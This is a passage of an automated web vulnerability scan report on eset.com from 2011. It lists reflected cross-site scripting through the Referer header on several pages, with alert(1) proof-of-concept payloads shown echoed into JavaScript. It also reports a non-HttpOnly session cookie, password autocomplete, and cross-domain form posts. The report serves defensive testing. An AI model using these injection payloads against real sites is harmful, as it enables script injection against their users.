Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/rss HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=c9f54"-alert(1)-"0b6f004dd10

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 15197
Date: Sun, 17 Apr 2011 14:15:49 GMT
X-Varnish: 1858169423
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=c9f54"-alert(1)-"0b6f004dd10";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.29. http://www.eset.com/us/sitemap [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/sitemap

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 936d3"-alert(1)-"a91f278d403 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/sitemap HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=936d3"-alert(1)-"a91f278d403

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 18971
Date: Sun, 17 Apr 2011 14:15:50 GMT
X-Varnish: 1858169450
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=936d3"-alert(1)-"a91f278d403";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.30. http://www.eset.com/us/store [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5491d"-alert(1)-"4a921ceb826 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=5491d"-alert(1)-"4a921ceb826

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38902
Date: Sun, 17 Apr 2011 14:15:56 GMT
X-Varnish: 1858169795
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
n
the next lines. */
s.pageName="";
s.server="";
s.channel="Store";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=5491d"-alert(1)-"4a921ceb826";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/online-scanner

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET /us/online-scanner HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=cactk8q566m5g6gpieoat7p2l0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 20674
Date: Sun, 17 Apr 2011 12:54:47 GMT
X-Varnish: 1857985694
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...

3. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/partners

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /us/partners HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 13815
Date: Sun, 17 Apr 2011 14:15:43 GMT
X-Varnish: 1858168825
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>W
...[SNIP]...
<div id="partner_login">
<form action="https://secure.eset.com/us/partners" method="post">
<h4>
...[SNIP]...
</label>
<input type="password" class="text" value="" name="password" />
</p>
...[SNIP]...

4. Referer-dependent response  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/online-scanner/run

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /us/online-scanner/run HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/online-scanner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.1.10.1303044897; s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 3895
Date: Sun, 17 Apr 2011 12:59:13 GMT
X-Varnish: 1857995600
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
nd channel on
the next lines. */
s.pageName="Online Scanner - Other Browser";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.eset.com/us/online-scanner";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>

Request 2

GET /us/online-scanner/run HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.1.10.1303044897; s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 3864
Date: Sun, 17 Apr 2011 12:59:36 GMT
X-Varnish: 1857996516
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
nd channel on
the next lines. */
s.pageName="Online Scanner - Other Browser";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="direct";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>

5. Cross-domain POST  previous  next
There are 8 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


5.1. http://www.eset.com/us/home/nod32-antivirus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home/nod32-antivirus

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/home/nod32-antivirus HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25430
Date: Sun, 17 Apr 2011 14:15:41 GMT
X-Varnish: 1858168734
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>N
...[SNIP]...
<div class="buy_box_eav">
<form id="ns_form_1" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<div class="windows_box">
...[SNIP]...

5.2. http://www.eset.com/us/home/smart-security  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home/smart-security

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25519
Date: Sun, 17 Apr 2011 14:15:41 GMT
X-Varnish: 1858168757
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="buy_box_ess">
<form id="ns_form_1" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<div class="windows_box">
...[SNIP]...

5.3. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38843
Date: Sun, 17 Apr 2011 14:15:45 GMT
X-Varnish: 1858169089
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div class="grey_tabs_content">
<form id="ns_form_4" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...

5.4. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38843
Date: Sun, 17 Apr 2011 14:15:45 GMT
X-Varnish: 1858169089
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div>
<form id="ns_form_5" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...

5.5. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38843
Date: Sun, 17 Apr 2011 14:15:45 GMT
X-Varnish: 1858169089
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div class="grey_tabs_content" style="display:none;">
<form id="ns_form_2" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...

5.6. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Accept: */*
